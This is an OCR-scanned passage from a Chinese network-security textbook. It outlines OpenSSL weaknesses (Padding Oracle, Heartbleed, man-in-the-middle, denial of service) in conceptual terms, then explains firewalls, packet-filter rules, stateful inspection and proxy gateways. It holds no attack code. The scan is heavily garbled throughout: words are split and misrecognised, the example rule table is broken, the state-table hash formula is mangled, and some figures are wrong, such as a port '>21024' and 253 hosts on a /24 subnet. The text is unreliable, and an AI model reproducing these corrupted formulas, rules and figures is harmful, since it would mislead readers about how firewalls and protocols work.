种 安全 性 也 是 密码 学 专家 和 研究 者 关注 的 重点 领域 ， 例 如 ， 主 要 研究 伪 随 机 数 生成 器 中 
的 相关 缺陷 对 各 种 密码 算法 Cy] RSA、ElGamal、DSA、ECDSA) 所 造成 的 严重 影响 。 
在 使 用 OpenSSL 密码 算法 库 时 , 如 果 生 成 密 钥 所 需 的 伪 随 机 数 不 够 随机 或 者 伪 随 机 数 生 
成 器 存在 缺陷 ， 则 该 密 钥 就 存在 遭受 破解 威胁 。 

6. PaddingOracle 缺陷 

在 密码 学 中 ， 密 码 块 链接 〈CipherBlockChaining，CBC) 作为 一 种 分 组 密码 工作 模 
sk, 在 SSL/ (D) TLS 协议 中 得 到 广泛 的 应 用 。CBC 工作 模式 是 在 密 钥 固定 不 变 的 情况 
下 , 改变 每 个 明文 组 输入 的 链接 技术 。 在 CBC 模式 下 , 初始 化 向 量 (InitializationVector， 
IV) 用 于 加 密 第 一 个 明文 块 ， 之 后 每 个 明文 块 在 加 密 之 前 ， 先 与 反馈 至 输入 端的 前 一 组 
密 文 逐 比特 异 或 ， 然 后 再 加 密 。 解 密 过 程 与 加 密 过 程 相反 。 由 于 分 组 密码 要 有 b 字 节 固 
定 长 度 的 密 钥 和 明文 (如 AES 的 长 度 b 为 16 字 节 )， 若 明文 长 度 多 于 b 字 节 ， 则 将 明文 
分 成 b 字 节 一 组 的 块 ， 若 最 后 一 块 不 满足 b 字 节 ， 则 要 对 其 进行 填充 ， 而 填充 则 要 根据 
规则 进行 ， 其 格式 为 : 填充 一 字 节 为 0x00， 两 字 节 为 0x01|l0x01， 三 字 节 为 
0x02||0x02||0x02. 

在 OpenSSL 实现 的 SSL/ CD) TLS 协议 中 ， 目 前 CBC 加 密 模式 使 用 MEE 
(MAC-Encode-Encrpt) 结构 ， 然 而 ， 这 种 结构 存在 设计 缺陷 ， 容 易 产 生 PaddingOracle 
攻击 的 威胁 ， 即 服务 器 在 验证 密 文 块 中 的 填充 是 否 正确 时 会 泄露 加 密 信 息 ， 通 常 称 为 
PaddingOracle 信息 ， 攻 击 者 可 以 通过 获得 的 PaddingOracle 信息 进行 密 文 恢复 。 

7. Heartbleed 缺陷 

在 分 析 Heartbleed 漏洞 攻击 之 前 ， 需 要 了 解 心跳 协议 。 心 跳 协 议 ， 简 单 说 就 是 数据 
通信 中 的 节点 需 定期 交换 消息 ， 即 定期 发 送 心跳 信号 ， 以 确保 远程 数据 服务 中 的 节点 能 
人 够 检测 到 网 络 中 断 或 节点 崩溃 。 

D) TLS 协议 中 的 心跳 扩展 协议 与 普通 网 络 使 用 的 心跳 协议 类 似 ， 为 了 确保 在 使 用 
D) TLS 协议 通信 的 双方 ， 能 够 感知 到 对 方 的 存在 ， 保 证 其 连接 的 有 效 性 ， 引 入 了 心跳 
扩展 协议 。 然 而 ， 基 于 OpenSSL 实现 的 心跳 扩展 协议 存在 边界 检查 漏洞 ， 由 于 没有 对 组 
冲 区 涉及 的 相关 “长 度 ” 进 行 检查 ， 泄 露 的 信息 内 容 可 能 包含 证 书 私 钥 、 用 户 账户 与 密 
码 、 电 子 邮 件 以 及 重要 的 商业 文档 和 通信 等 数据 。 

8. 中 间 人 攻击 缺陷 

中 间 人 攻击 (Man-in-the-MiddleAttack, MITM) 是 一 种 由 来 已 久 的 网 络 攻击 手段 ， 
并 且 在 今天 仍然 有 着 广泛 的 发 展 空间 ， 例 如 SMB 会 话 劫持 、DNS 欺骗 等 攻击 ， 都 是 典 
型 的 MITM 攻击 。 简 而 言 之 , 所 谓 的 MITM 攻击 就 是 在 通信 双方 毫 无 察觉 的 情况 下 , 通 
过 拦截 正常 的 网 络 通信 数据 ， 进 而 对 数据 进行 咱 探 或 算 改 。OpenSSLSSL/ (D) TLS 协 
议 中 实现 的 握手 过 程 存在 检查 验证 漏洞 易 被 中 间 人 利用 ， 通 过 伪造 修改 密码 规范 数据 或 
者 证 书 达到 中 间 人 攻击 的 目的 。 
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9. 拒绝 服务 缺陷 

DoS 是 DenialofService 的 简称 ， 即 拒绝 服务 ， 造 成 DoS 的 攻击 行为 被 称 为 Dos Be 
击 。 虽 然 具 体 的 实现 方式 千变万化 ， 但 都 有 一 个 共同 点 ， 即 其 根本 目的 是 用 超出 目标 处 
理 能 力 的 海量 数据 包 消 耗 可 用 的 系统 资源 、 带 宽 资源 等 ， 使 受害 主机 或 网 络 无 法 及 时 接 
收 并 处 理 外 界 请 求 ， 或 无 法 及 时 回应 外 界 请 求 。 在 OpenSSL 针对 SSL/ (D) TLS 协议 的 
具体 实现 中 ， 存 在 着 许多 代码 编写 问题 ， 如 递归 漏洞 、 空 指针 引用 等 。 利 用 这 些 缺 陷 ， 
很 容易 使 客户 端 或 者 服务 器 产生 拒绝 服务 。 


3.4 网 络 安全 防御 


本 节 主 要 介绍 网 络 安全 防御 技术 的 概念 、 原 理 和 基本 应 用 ， 包 括 防火 墙 、 入 侵 检 测 
与 防护 、VPN、 安 全 扫描 和 风险 评估 、 网 络 蜜 色 技术 ， 以 及 常见 的 安全 协议 。 


3.4.1 防火 墙 


防火 墙 是 一 种 较 早 使 用 、 实 用 性 很 强 的 网 络 安全 防御 技术 ， 它 阻挡 对 网 络 的 非法 访 
问 和 不 安全 数据 的 传递 ， 使 得 本 地 系统 和 网 络 兔 于 受到 许多 网 络 安全 威胁 。 本 小 节 介绍 
防火 墙 的 基本 概念 、 实 现 技术 、 体 系 结构 、 配 置 与 应 用 。 
3.4.1.1 ”防火墙 的 基本 概念 

防火 墙 (FireWall) 一 词 源 于 早期 欧式 建筑 中 ， 是 为 了 防止 火灾 的 蔓延 而 在 建筑 物 
之 间 修 建 的 矮 墙 ， 也 类 似 于 我 国 古代 的 护城河 ， 可 以 阻挡 敌人 的 进攻 。 在 网 络 安 全 中 ， 
防火 墙 主 要 用 于 逻辑 隔离 外 部 网 络 与 受 保护 的 内 部 网 络 。 防 火 墙 技 术 的 典型 应 用 如 图 
3-46 所 示 。 


受 保护 


外 部 网 络 内 部 网 络 


防火 墙 
图 3-46 防火 墙 的 基本 示意 图 


防火 墙 主要 是 实现 网 络 安全 的 安全 策略 ， 而 这 种 策略 是 预先 定义 好 的 ， 所 以 是 一 种 
静态 安全 技术 。 在 策略 中 涉及 的 网 络 访问 行为 可 以 实施 有 效 管 理 ， 而 策略 之 外 的 网 络 访 
问 行为 则 无 法 控制 。 防 火 墙 的 安全 策略 由 安全 规则 表示 。 

防火 墙 的 安全 规则 由 匹配 条 件 与 处 理 方式 两 个 部 分 共同 构成 。 其 中 匹配 条 件 是 一 些 
逻辑 表达 式 ， 根 据 信息 中 的 特定 值 域 可 以 计算 出 这 些 逻 辑 表 达 式 的 值 。 当 网 络 流量 经 过 
防火 墙 时 ， 如 果 此 时 匹配 条 件 的 逻辑 表达 式 为 真 ， 则 说 明 该 流量 与 当前 规则 匹配 。 该 流 
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量 一 旦 与 规则 匹配 ， 就 必须 采用 规则 中 的 处 理 方式 进行 处 理 。 一 般 来 说 ， 大 多 数 防火 墙 
规则 中 的 处 理 方式 主要 包括 以 下 几 种 : 

e Accept: 人 允许 数据 包 或 信息 通过 。 

。 Reject: 拒绝 数据 包 或 信息 通过 ， 并 且 通 知 信息 源 该 信息 被 禁止 。 

© Drop: 直接 将 数据 包 或 信息 丢弃 ， 并 且 不 通知 信息 源 。 

一 般 地 ， 安 全 规则 无 法 覆盖 所 有 的 网 络 流量 。 为 此 ， 人 们 为 防火 墙 添 加 一 条 缺 省 规 
则 ， 该 规则 能 覆盖 人 们 无 法 预料 到 的 网 络 流量 。 缺 省 规则 有 两 种 选择 : 默认 拒绝 或 者 默 
认 人 允许 。 

1. 默认 拒绝 

默认 拒绝 是 指 一 切 未 被 允许 的 就 是 禁止 的 。 其 安全 规则 的 处 理 方式 一 般 为 Accept， 
通过 防火 墙 的 信息 流 逐 条 规则 地 进行 匹配 ， 只 要 与 其 中 任何 一 条 匹配 ， 则 允许 通过 ;， 如 
果 不 能 与 任何 一 条 规则 匹配 则 认为 该 信息 不 能 通过 防火 墙 。 采 用 该 策略 的 防火 墙 具 有 较 
高 的 安全 性 ， 也 是 目前 常用 的 缺 省 安全 策略 。 其 不 足 是 限制 了 网 络 服务 的 种 类 。 

2. 默认 允许 

默认 允许 是 指 一 切 未 被 禁止 的 就 是 允许 的 。 其 安全 规则 的 处 理 方式 一 般 为 Reject 或 
Drops 通过 防火 墙 的 信息 逐条 规则 进行 匹配 , 一 旦 与 规则 匹配 就 会 被 防火 墙 丢弃 或 禁止 ; 
如 果 信息 不 能 与 任何 规则 匹配 , 则 可 以 通过 防火 墙 。 采用 该 策略 的 防火 墙 使 用 较为 方便 ， 
规则 配置 较为 灵活 ， 但 是 缺乏 安全 性 。 

安全 规则 都 是 由 安全 管理 员 根 据 网 络 安全 威胁 和 系统 安全 需求 进行 配置 ， 规 则 的 处 
理 方式 既 可 以 使 用 Accept, 也 可 以 使 用 Reject Bk Drop, 但 原则 上 需要 与 缺 省 规则 保持 连 
贯 性 。 现 有 的 防火 墙 产品 都 支持 各 种 安全 规则 的 配置 。 

防火 墙 的 目的 是 实施 访问 控制 和 加 强 站 点 安全 策略 ， 其 访问 控制 包含 四 个 方面 或 层 
次 的 内 容 : 

@ 服务 控制 : 决定 哪些 服务 可 以 被 访问 ， 无 论 这 些 服务 是 在 内 部 网 络 还 是 在 外 部 
网 络 。 常 见 的 网 络 服务 有 邮件 服务 、 网 页 服务 、 代 理 服务 、 文 件 服务 等 ， 这 些 服务 往往 
是 系统 对 外 的 功能 。 在 计算 机 网 络 中 ， 服 务 往往 就 是 指 TCP/IP 协议 中 的 端口 值 ， 如 25 
是 指 SMTP 服务 ，110 是 指 POP3 服务 ，80 是 指 网 页 服务 等 。 当 然 ， 服 务 控 制 也 包括 服 
务 的 位 置 控制 ， 如 IP 地 址 。 

© 方向 控制 : 决定 在 哪些 特定 的 方向 上 服务 请 求 可 以 被 发 起 并 通过 防火 墙 ， 也 就 
是 服务 是 位 于 内 部 网 络 还 是 外 部 网 络 。 通 过 规则 控制 ， 可 以 限定 一 个 方向 的 服务 ， 也 可 
以 同时 限定 两 个 方向 的 服务 。 

© 用 户 控制 : 决定 哪些 用 户 可 以 访问 特定 服务 。 该 技术 既 可 以 应 用 于 防火 墙 网 络 
内 部 的 用 户 ( 本 地 用 户 )， 也 可 以 被 应 用 到 来 自 外 部 用 户 的 访问 。 可 以 采用 用 户 名 、 主 机 
HIP, ENL MAC 等 标识 用 户 。 

@ 行为 控制 : 决定 哪些 具体 的 服务 内 容 是 否 符合 安全 策略 。 如 防火 墙 可 以 通过 过 
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滤 邮 件 来 清除 垃圾 邮件 ， 以 及 网 络 流量 中 是 否 含有 计算 机 病毒 、 木 马 等 恶意 代码 。 
在 了 解 防火 墙 的 实现 技术 、 分 类 和 配置 的 细节 之 前 ， 我 们 必须 知识 防火 墙 究竟 能 够 
做 什么 。 防 火 墙 可 以 实现 的 功能 如 下 : 
® 防火 墙 设立 了 单一 阻塞 点 ， 它 使 得 未 授权 的 用 户 无 法 进入 网 络 ， 禁 止 了 潜在 的 
易 受 攻击 的 服务 进入 或 是 离开 网 络 , 同时 防止 了 多 种 形式 的 IP 欺骗 和 路 由 攻击 。 单一 阻 
塞 点 的 使 用 简化 了 安全 管理 ， 因 为 安全 措施 都 被 集中 实施 。 
@ 防火 墙 提供 了 一 个 监控 安全 事件 的 地 点 。 对 于 安全 问题 的 检查 和 警报 可 以 在 防 
火 墙 系统 上 实施 。 
@ 防火 墙 还 可 以 提供 一 些 其 他 功能 , 比如 地 址 转换 器 , 它 把 私有 地 址 映射 为 Intenet 
地 址 ， 又 如 网 络 管理 功能 ， 它 用 来 审查 和 记录 Intemet 的 使 用 。 
@ 防火 墙 可 以 作为 IPSec 的 平台 。 防 火 墙 可 以 用 来 实现 虚拟 专用 网 络 。 
防火 墙 也 有 它 的 自身 局 限 性 ， 例 如 : 
@ 防火 墙 不 能 防御 绕 过 了 它 的 攻击 。 网 络 内 部 可 能 会 有 通过 拨号 或 者 无 线 局 域 网 
接 入 互联 网 的 主机 ， 通 过 这 些 主机 的 网 络 流量 没有 经 过 防火 墙 ， 从 而 形成 安全 隐患 。 
@ 防火 墙 不 能 消除 来 自 内 部 的 威胁 ， 比 如 某 个 心怀 不 满 的 雇员 或 者 某 个 私下 里 与 
络 外 部 攻击 者 联手 的 雇员 。 
@ 防火 墙 不 能 防止 病毒 感染 过 的 程序 和 文件 进出 网 络 。 事 实 上 ， 安 装 了 防火 墙 的 
网 络 系统 内 部 ， 运 行 着 多 种 多 样 的 操作 系统 和 应 用 程序 ， 想 通过 扫描 所 有 进出 网 络 的 文 
件 ， 电 子 邮 件 以 及 信息 来 检测 病毒 的 方法 ， 是 不 实际 的 。 
目前 ， 防 火 墙 是 防 外 不 防 内 的 安全 技术 。 随 着 技术 的 不 断 发 展 和 用 户 安全 需求 的 增 
长 ， 防 火 墙 的 功能 不 断 增 强 ， 特 别 是 面向 应 用 的 安全 功能 ， 如 防 病毒 、 内 容 审查 等 。 另 
外 ， 防 火 墙 也 可 能 与 入 侵 检测 系统 联动 。 当 入 侵 检 测 系统 发 现 入 侵 后 ， 立 即 通知 防火 墙 
阻 断 入 侵 流量 。 
3.4.1.2 ”防火 墙 的 实现 技术 
防火 墙 的 种 类 较 多 ， 可 以 从 多 个 角度 对 其 进行 分 类 。 
按照 防火 墙 放置 的 位 置 不 同 ， 可 以 分 为 : 
。 个 人 防火 墙 (主机 ): 放置 在 个 人 主机 上 ， 主 要 保护 单个 主机 。 例 如 : 瑞星 防火 
墙 、CoModo 防火 墙 、 天 网 防火 墙 个 人 版 、 费 尔 个 人 防火 墙 (补充 ) 等 。 

。 企业 防火 墙 〈 网 络 ): 放置 在 网 络 的 边界 ， 对 整个 网 络 实施 保护 。 例 如 : 赛 门 铁 
区 防火 墙 、 诺 顿 企 业 版 防火 墙 、 思 科 企业 防火 墙 、 阿 姆 瑞 特 (Amaranten) 防火 
墙 、Juniper 防火 墙 、 天 元 龙马 防火 墙 (补充) 等 。 

按照 防火 墙 实现 的 载体 不 同 ， 可 以 分 为 

。 软件 防火 墙 : 数据 包 的 拦截 、 处 理 和 过 滤 都 是 用 软件 实现 的 防火 墙 。 例 如 : 瑞星 

防火 墙 、 天 网 防火 墙 个 人 版 、 卡 巴 斯 基 防火 墙 (补充 ) 等 。 

。 硬件 防火 墙 : 数据 包 的 拦截 、 处 理 和 过 滤 都 是 用 纯 硬 件 (ASIC 芯片 ) 实现 的 防 
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火 墙 .例如 : 思科 防火 墙 、 阿 姆 瑞 特 (Amaranten ) 防 火 墙 ,Juniper 防火 墙 ` NetScreen 
防火 墙 、 天 元 龙马 防火 墙 等 。 

按照 防火 墙 实现 的 技术 不 同 ， 可 以 分 为 : 

。 数据 包 过 滤 : 对 数据 包 进 行 处 理 ， 是 防火 墙 必须 实施 的 一 种 技术 。 

。 应 用 层 网 关 : 能 理解 和 处 理应 用 层 协 议 ， 可 以 更 准确 地 实施 访问 控制 。 

。 电路 层 网 关 : 提供 网 络 连接 的 桥接 服务 ， 可 以 根据 访问 策略 实施 接 入 和 接 出 。 
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(c) 电路 层 网 关 
图 3-47 ”防火 墙 实现 技术 的 类 型 
三 种 实现 技术 如 图 3-47 所 示 。 
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1. 数据 包 过 滤 

由 于 目前 TCP/IP 协议 族 是 国际 互联 网 上 的 主流 协议 ， 大 多 数 网 络 应 用 都 是 借助 于 
该 协议 族 实现 信息 传递 ， 因 此 目前 防火 墙 产 品 大 都 是 以 TCP/IP 协议 族 为 基础 而 设计 。 
TCP/IP 协议 族 具 有 明显 的 层次 特性 ， 由 物理 接口 层 、 网 络 层 、 传 输 层 、 应 用 层 四 层 协议 
构成 ， 每 个 层次 的 作用 都 不 相同 ， 防 火 墙 产品 在 不 同 层次 上 实现 信息 过 滤 与 控制 所 采用 
的 策略 也 不 相同 。 数据 包 过 滤 的 基本 原理 就 是 根据 经 典 安 全 模型 , 在 系统 进行 人 P 数据 包 
转发 时 设置 访问 控制 列表 , 对 人 P 数据 包 进行 访问 控制 。 访问 控制 列表 主要 由 各 种 规则 组 
成 ,由 于 TCP/IP 协议 实现 的 特殊 性 ,数据 包 过 滤 的 规则 主要 采用 网 络 层 与 传输 层 的 信息 ， 
一 旦 数据 包 与 规则 的 匹配 条 件 相 匹配 ， 就 会 采用 对 应 规则 的 处 理 方式 。 

当 防 火 墙 在 网 络 层 实现 信息 过 滤 与 控制 时 ， 主 要 是 针对 TCP/IP 协议 中 的 下 数据 包 
头 部 制定 规则 的 匹配 条 件 并 实施 过 滤 ， 其 规则 的 匹配 条 件 包括 以 下 内 容 : 

。 IP 源 地 址 一 一 IP 数据 包 的 发 送 主机 地 址 ; 

。 耳目 的 地 址 一 一 也 数据 包 的 接收 主机 地 址 ; 

© 协议 一 一 IP 数据 包 中 封装 的 协议 类 型 ， 包 括 TCP. UDP 或 ICMP 包 等 。 

如 果 防 火 墙 只 能 理解 IP 协议 ， 则 防火 墙 只 能 处 理 下 数据 包 。IP 地 址 的 表示 可 以 是 
单个 主机 , 也 可 以 是 子 网 , 如 192.168.0.1 表示 一 个 具体 的 主机 , 192.168.0.0/255.255.255.0 
则 表示 一 个 拥有 253 个 主机 的 子 网 。 

如 果 防 火 墙 还 可 以 工作 在 传输 层 ， 则 防火 墙 可 以 处 理 传输 层 协议 ， 如 TCP 或 UDP, 
其 规则 的 匹配 条 件 可 包含 如 下 内 容 : 

。 源 端口 一 一 发 送 TCP 或 UDP 数据 包 应 用 程序 的 绑 定 端口 ; 

。 目的 端口 一 一 接收 TCP 或 UDP 数据 包 应 用 程序 的 绑 定 端口 ; 

。 ACK 人 码 字 一 一 TCP 协议 的 状态 标志 位 ， 标 记 IP 数据 报 是 第 一 个 数据 报 还 是 后 续 

数据 报 。 

对 端口 运算 包括 “=”“>”“<” 等 。 如 

。 目的 端口 =21 一 一 表示 该 数据 包 需 要 传递 到 21 号 端口 的 应 用 程序 。 

。 目的 端口 >21024 一 一 表示 该 数据 包 需 要 传递 到 大 于 1024 端口 值 的 应 用 程序 。 

实例 3-1: 某 企业 内 部 网 (202.114.63.0/255.255.255.0) 通过 防火 墙 与 外 部 网 络 互 连 ， 
其 安全 需求 为 : 

外 允许 内 部 用 户 访问 外 部 网 络 的 网 页 服务 器 ; 

@ 允 许 外 部 用 户 访 问 内 部 网 络 的 网 页 服务 器 (202.114.64.125); 

@ 除 1 和 2 外， 禁止 其 他 任何 网 络 流量 通过 该 防火 墙 。 

试 写 出 满足 该 需求 的 过 滤 安全 规则 。 

分 析 : 安全 规则 涉及 的 服务 有 网 页 服务 器 、 域 名 服务 ， 所 以 其 端口 有 80、53。 一 般 
的 服务 地 址 采用 URL， 必 须 采 用 域名 服务 把 该 地 址 转换 为 P 地 址 。 其 安全 规则 如 表 3-8 
所 示 。 
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* 


| * | 80 202.114.63.0/24 accept 
| * | >1024 | 202.114.64.125 accept 
| 80 


K 3-8 中 “*” 表 示 通 配 符 ， 任 意 服务 端口 都 有 两 条 规则 。 服 务 总 是 由 请 求 和 应 答 构 
成 ， 其 中 请 求 数据 包 和 应 答 数据 包 的 传输 方向 完全 相反 。 如 果 允 许 该 服务 通过 ， 则 匹配 
请 求 和 应 答 的 规则 也 必须 成 对 出 现 ; 如 果 限制 该 服务 , 限制 任何 一 个 都 可 以 中 止 该 服务 。 
但 是 在 配置 数据 包 过 滤 规 则 时 ， 要 尽 可 能 地 对 双向 的 数据 包 都 进行 限制 。 

UU A 和 B 允许 内 部 用 户 访 问 外 部 网 络 的 网 页 服务 器 。 

MW C 和 D 允许 外 部 用 户 访问 内 部 网 络 的 网 页 服务 器 。 

SU E RIF 允许 内 部 用 户 访 问 域名 服务 器 。 

MDW G 是 缺 省 拒绝 的 规则 。 

当 这 些 规则 作用 于 网 络 数据 包 时 ， 需 要 对 每 一 个 经 过 该 防火 墙 的 数据 进行 检测 ， 
而 有 效 地 实现 访问 控制 策略 。 图 3-48 为 匹配 的 示意 图 。 


we 查询 规则 表 检查 IP 数据 包头 部 网 络 数据 包 
规则 表 c= > 


防火 墙 


图 3-48 ”数据 包 过 滤 匹 配 图 


在 图 3-48 中 ， 匹 配 过程 是 顺序 匹配 ， 匹 配 的 代价 与 规则 个 数 成 线性 关系 。 在 防火 墙 
下 全 
线 速 ， 即 匹配 时 间 与 规则 数 无 关 ， 是 一 个 常量 。 

包 过 滤 技 术 的 优点 是 简单 ， 处 理 速度 也 很 快 。 

包 过 滤器 防火 墙 的 缺点 有 : 

O 包 过 滤器 防火 墙 不 检查 上 层 数 据 ， 因 此 ， 对 于 那些 利用 特定 应 用 漏洞 的 攻击 ， 
防火 墙 无 法 防范 。 例 如 ， 包 过 滤 防 火 墙 不 能 阻塞 各 种 漏洞 攻击 程序 。 
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@ 通常 容易 受到 利用 TCP/IP 协议 栈 漏 洞 的 攻击 ， 例 如 网 络 层 地 址 欺骗。 

© 包 过 滤器 防火 墙 对 那 种 由 于 不 恰当 的 设置 而 导致 的 安全 威胁 显得 十 分 脆弱 。 换 
句 话 说， 偶然性 的 改动 可 能 会 导致 防火 墙 允 许 某 些 传输 类 型 、 源 地 址 和 目的 地 址 的 数据 
包 通 过 ， 而 事实 上 按照 该 系统 安全 策略 的 要 求 ， 这 些 数据 包 是 应 该 被 阻塞 的 。 

包 过 滤 技 术 可 能 存在 的 攻击 有 : 

@ P 地 址 欺骗 ， 入 侵 者 从 防火 墙 外 部 发 送 一 个 源 地 址 为 内 部 主机 的 数据 包 。 攻 击 
者 试图 利用 假 的 地 址 来 进入 那些 仅 对 源 地 址 信赖 的 系统 。 应 对 攻击 的 方法 是 一 旦 在 防火 
墙 的 外 部 接口 处 发 现 源 地 址 是 内 部 地 址 的 数据 包 ， 直 接 丢 弃 。 

© 源 路 由 攻击 : 攻击 者 在 来 源 位 置 注 明 数据 包 在 Internet 上 传输 时 所 应 该 采用 的 路 
由 ， 由 此 希望 绕 过 那些 安全 措施 。 应 对 措施 是 丢弃 所 有 使 用 了 这 个 选项 的 数据 包 。 

© 微分 片 攻击 : 入 侵 者 使 用 IP 分 片 选 项 来 制造 出 非常 小 的 分 片 ， 分 片 如 此 之 小 ， 
使 得 TCP 头 信息 只 能 被 放 在 一 个 独立 的 分 片 中 。 这 种 攻击 方法 用 来 对 付 那些 过 滤 规 则 只 
能 依赖 于 TCP 头 信息 的 防火 墙 很 是 有 效 。 一 般 过 滤 防 火 墙 仅仅 检查 第 一 个 分 片 ， 然 后 将 
后 面 的 所 有 的 分 片 统统 放行 。 如 果 防 火 墙 将 TCP 的 IP 碎片 偏 移 比较 小 的 分 片 都 丢弃 ， 
这 种 攻击 也 就 失效 。 

由 于 传统 的 包 过 滤器 会 对 每 一 个 数据 包 进行 检测 ， 而 不 去 考虑 数据 包 之 间 的 上 下 
文 ， 对 于 连接 中 源 地 址 、 源 端口 、 目 标 地 址 、 目 标 端口 都 保持 不 变 的 多 个 数据 包 来 说 ， 
包 过 滤 的 效率 和 性 能 往往 受到 影响 。 于 是 产生 了 一 种 新 的 ， 与 包 过 滤 相 类 似 的 、 更 为 有 
效 的 安全 控制 方法 ， 即 状态 检查 技术 。 

状态 检查 技术 是 包 过 滤 技 术 的 一 种 增强 ， 其 主要 思想 就 是 利用 防火 墙 已 经 验证 通过 
的 连接 ， 建 立 一 个 临时 的 状态 表 。 状 态 表 的 生成 过 程 是 ， 对 新 建 的 应 用 连接 ， 状 态 检 测 
检查 预先 设置 的 安全 规则 ， 人 允许 符合 规则 的 连接 通过 ， 并 在 内 存 中 记录 下 该 连接 的 相关 
信息 ， 生 成 状态 表 。 状 态 表 中 的 记录 随时 间 不 断 刷 新 。 这 个 状态 表 类 似 于 网 络 安全 中 的 
白 名 单 技术 ， 这 种 白 名 单 常 见于 垃圾 邮件 处 理 中 。 

状态 检查 的 过 程 〈 见 图 3-49): 当 一 个 新 的 数据 包 到 达 防 火 墙 ， 防 火 墙 首先 检查 它 
是 否 在 状态 表 中 。 如 果 在 ， 则 允许 通过 ; 如 果 不 在 ， 则 采用 包 过 滤 技 术 进 行 检查 。 对 于 
状态 表 中 一 定时 间 内 没有 数据 包 对 应 匹配 的 记录 信息 ， 则 删除 之 。 状 态 检 查 可 以 缩短 合 
法 数据 包 在 防火 墙 的 通关 时 间 。 

表 3-9 是 状态 表 的 一 个 实例 。Hash 求 值 过 程 如 下 

@ 每 个 报 文 具有 一 个 四 元 组 { 源 人 下、 目的 卫 、 源 端口 、 目 的 端口 }。 将 卫 字段 分 成 
前 16bit 串 和 后 16bit 串 ,因此 得 到 一 个 六 元 组 人 源 于 前 16bit(bsip)、 源 下 后 16bit(asip)、 
目的 下 前 16bit (bdip)、 目 的 他 后 16bit (adip)、 源 端口 (sport)、 目 的 端口 (dport) }。 


第 3 章 


防火 墙 


符合 规则 的 插入 状态 表 


图 3-49 ”状态 检查 过 程 


@Hash 值 的 计算 过 程 如 下 : 
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(车 状态 表 中 没有 匹配 ) 
Ss 查询 规则 表 检查 IP wala 网 络 数据 包 


hashl=asip<<3|asip>> (16-3) ;hashl=hash1/\adip;hash=hash1; 
hashl=bsip<<3|bsip>> (16-3) ;hashl=hash1/sport;hash/A=hash1; 
hash1=bdip<<3|bdip>> (16-3) ;hashl=hash1/\dport;hash/\=hash1l. 


FOE eB CA), A C>) 和 左 移 (<<) HIE. hashl, hash 为 16bit 无 符 


号 整 型 。hash 是 异 或 、 位 移 算 法 返回 的 哈 希 序列 。 
表 3-9 状态 表 的 一 个 实例 


源 地 址 源 端口 Hash 连接 状态 
192.168.1.100 1030 | 121.1940218 | so | 2416630 已 建立 
207.46.110.30 1863 eons | o 2474007 已 建立 
207.46.113.220 | 443 121.194.0.205 2285056 已 建立 
207.46.113.222 | 1035 | 207.46.213.123 2579989 已 建立 
60.28.183.194 | 1990 | 125.221.46.212 2133858 已 建立 
218.202.225.63 | 2112 65.55.15.123 2285112 已 建立 

221.130.179.185 | 3321 65.54.195.188 2508876 已 建立 
221.130.179.172 | 1025 2197731 已 建立 

2. 应 用 层 网 关 

应 用 层 网 关 也 叫做 代理 服务 器 。 它 在 应 用 层 的 通信 中 扮演 着 一 个 消息 传递 者 的 角 

色 。 用 户 使 用 Telnet 和 FTP 之 类 的 TCP/IP 应 用 程序 时 建立 了 一 个 到 网 关 的 连接 ， 这 个 


网 关 要 求 用 户 给 出 将 要 访问 的 异地 机 器 的 正确 名 称 。 如 果 用 户 给 出 了 一 个 有 效 的 用 户 DD 
和 验证 信息 ， 网 关 就 建立 一 个 到 异地 机 器 的 应 用 层 连 接 ， 并 开始 在 访问 者 和 被 访问 者 之 
间 传 递 包 含 着 应 用 数据 的 TCP 数据 段 。 如 果 网 关 无 法 理解 应 用 ， 防 火 墙 会 阻 断 该 应 用 对 
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应 数据 包 。 

应 用 层 网 关 看 上 去 要 比 包 过 滤器 更 加 安全 。 它 不 再 去 试图 处 理 TCP/IP 协议 层 的 信 
息 ， 而 是 只 需要 去 考虑 那些 允许 通过 的 应 用 程序 。 而 且 ， 在 应 用 层 上 进行 日 志 管 理 和 用 
户 认证 要 容易 些 。 另 外 ， 应 用 层 网 关 也 可 以 实现 Cache 机 制 ， 该 Cache 机 制 不 仅 可 以 减 
少 网 络 流量 ， 同 时 可 以 明显 提高 对 较 频 繁 访问 网 络 资源 的 访问 速度 。 

应 用 层 网 关 支持 用 户 概念 ， 可 以 提供 用 户 认 证 等 用 户 安全 策略 。 应 用 层 网 关 可 以 实 
现 基 于 内 容 的 信息 过 滤 。 但 是 如 果 必 须 对 每 种 服务 提供 应 用 代理 ， 每 开通 一 种 服务 ， 就 
必须 在 防火 墙 上 添加 相应 的 服务 进程 。 另外, 代理 网 关 不 太 适合 实时 性 要 求 太 高 的 服务 ， 
而 且 对 用 户 的 透明 性 低 。 

3. 电路 层 网 关 

第 三 种 防火 墙 技术 是 电路 层 网 关 。 它 是 负责 数据 转发 的 独立 系统 , 类 似 于 网 络 渡船 。 
电路 层 网 关 不 允许 一 个 端 到 端的 直接 的 TCP 连接 ， 它 由 网 关 建 立 两 个 TCP 连接 ， 一 个 
连接 网 关 与 网 络 内 部 的 TCP 用 户 ， 一 个 连接 网 关 与 网 络 外 部 的 TCP 用户。 连接 建立 之 
后 ， 网 关 就 起 着 一 个 中 继 的 作用 ， 将 数据 段 从 一 个 连接 转发 到 另 一 个 连接 。 它 通过 决定 
哪个 连接 被 允许 建立 来 实现 安全 策略 。 

电路 层 网 关 的 具体 应 用 是 在 一 个 系统 管理 员 信任 内 部 用 户 的 环境 里 。 配 置 网 关 ， 使 
得 它 在 与 内 部 用 户 的 连接 上 支持 应 用 层 也 就 是 代理 的 服务 ， 而 在 与 外 部 用 户 的 连接 上 支 
持 电路 层 功能 。 这 样 ， 虽 然 网 关 在 对 进入 内 部 的 数据 检查 以 发 现 系统 禁止 的 操作 时 仍然 
会 有 处 理 开销 ， 但 在 处 理 到 网 络 外 部 的 数据 时 则 不 会 有 此 开销 。 

电路 层 网 关 的 协议 有 SOCKS, 包括 SOCKSS[RFC1928].SOCKS 协议 为 TCP 和 UDP 
的 客户 端 /服务 器 应 用 程序 提供 一 个 框架 ， 使 得 它们 更 为 安全 和 便利 的 使 用 防火 墙 。 从 概 
念 上 看 ， 该 协议 可 以 看 作 是 应 用 层 和 传输 层 之 间 的 一 个 “薄片 层 ”。 

当 客 户 端 希望 与 目标 的 建立 连接 时 , 首先 必须 建立 与 SOCKS 服务 (端口 号 为 1080) 
的 TCP 连接 。 如 果 请 求 成 功 ， 客 户 端 与 服务 系统 之 间 进 行 验证 和 协商 ， 然 后 发 送 转发 请 
